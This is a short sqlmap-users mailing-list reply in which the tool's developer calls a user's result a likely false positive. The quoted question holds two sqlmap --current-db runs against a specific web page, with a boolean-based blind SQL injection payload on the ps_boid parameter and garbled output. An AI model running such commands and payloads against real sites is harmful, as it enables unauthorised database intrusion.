Hi.

Most probably a false positive.

Bye


On Sat, May 3, 2014 at 11:02 PM, Dev <1240635...@qq.com> wrote:

> I can't figure out why this happens
>
> root@pk:~# sqlmap -u "http://www.net/m_view.php?ps_db=notice&ps_boid=149";
> --current-db
>
>     sqlmap/1.0-dev-b54651b - automatic SQL injection and database takeover
> tool
>     http://sqlmap.org
>
> [*] starting at 05:58:05
>
> [05:58:05] [INFO] resuming back-end DBMS 'mysql'
> [05:58:05] [INFO] testing connection to the target URL
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> requests:
> ---
> Place: GET
> Parameter: ps_boid
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause
>     Payload: ps_db=notice&ps_boid=149) AND 4099=4099 AND (2004=2004
> ---
> [05:58:14] [INFO] the back-end DBMS is MySQL
> web application technology: PHP 4.4.9, Apache
> back-end DBMS: MySQL 4
> [05:58:14] [INFO] fetching current database
> [05:58:14] [INFO] resumed: \\?9e\\?9e\\?9e\\?9e\\?9e\\?9e\\?9e
> current database:    '\?9e\?9e\?9e\?9e\?9e\?9e\?9e'
> [05:58:14] [INFO] fetched data logged to text files under
> '/usr/share/sqlmap/output/www.net'
>
> [*] shutting down at 05:58:14
>
> root@pk:~# sqlmap -u "http://www.net/m_view.php?ps_db=notice&ps_boid=149";
> --current-db
>
>     sqlmap/1.0-dev-b54651b - automatic SQL injection and database takeover
> tool
>     http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> mutual consent is illegal. It is the end user's responsibility to obey all
> applicable local, state and federal laws. Developers assume no liability
> and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 05:59:17
>
> [05:59:17] [INFO] resuming back-end DBMS 'mysql'
> [05:59:17] [INFO] testing connection to the target URL
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> requests:
> ---
> Place: GET
> Parameter: ps_boid
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause
>     Payload: ps_db=notice&ps_boid=149) AND 4099=4099 AND (2004=2004
> ---
> [05:59:18] [INFO] the back-end DBMS is MySQL
> web application technology: PHP 4.4.9, Apache
> back-end DBMS: MySQL 4
> [05:59:18] [INFO] fetching current database
> [05:59:18] [INFO] resumed: \\?9e\\?9e\\?9e\\?9e\\?9e\\?9e\\?9e
> current database:    '\?9e\?9e\?9e\?9e\?9e\?9e\?9e'
> [05:59:18] [INFO] fetched data logged to text files under
> '/usr/share/sqlmap/output/www.net'
>
> [*] shutting down at 05:59:18
>
> root@pk:~#
>
> ------------------------------------------------------------------------------
> "Accelerate Dev Cycles with Automated Cross-Browser Testing - For FREE
> Instantly run your Selenium tests across 300+ browser/OS combos.  Get
> unparalleled scalability from the best Selenium testing platform available.
> Simple to use. Nothing to install. Get started now for free."
> http://p.sf.net/sfu/SauceLabs
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm